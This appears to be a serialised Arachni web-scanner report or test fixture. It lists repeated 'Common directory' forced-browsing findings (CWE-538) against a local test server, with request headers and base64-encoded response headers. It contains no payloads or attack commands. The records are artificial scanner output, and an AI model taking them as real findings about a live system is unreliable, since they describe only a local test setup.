mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/retail/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/retail/ injected: retail id: retail elem: path remarks: {} method: '' response: retail headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/reseller/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/reseller/ injected: reseller id: reseller elem: path remarks: {} method: '' response: reseller headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/app/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/app/ injected: app id: app elem: path remarks: {} method: '' response: app headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/beta/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/beta/ injected: beta id: beta elem: path remarks: {} method: '' response: beta headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/boot/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/boot/ injected: boot id: boot elem: path remarks: {} method: '' response: boot headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/bug/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/bug/ injected: bug id: bug elem: path remarks: {} method: '' response: bug headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/bugs/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/bugs/ injected: bugs id: bugs elem: path remarks: {} method: '' response: bugs headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/buy/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/buy/ injected: buy id: buy elem: path remarks: {} method: '' response: buy headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/auth/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/auth/ injected: auth id: auth elem: path remarks: {} method: '' response: auth headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/authadmin/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/authadmin/ injected: authadmin id: authadmin elem: path remarks: {} method: '' response: authadmin headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/import/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/import/ injected: import id: import elem: path remarks: {} method: '' response: import headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/application/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/application/ injected: application id: application elem: path remarks: {} method: '' response: application headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/apps/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/apps/ injected: apps id: apps elem: path remarks: {} method: '' response: apps headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/access-log/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/access-log/ injected: access-log id: access-log elem: path remarks: {} method: '' response: access-log headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTA= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/catalog/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/catalog/ injected: catalog id: catalog elem: path remarks: {} method: '' response: catalog headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/cert/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/cert/ injected: cert id: cert elem: path remarks: {} method: '' response: cert headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
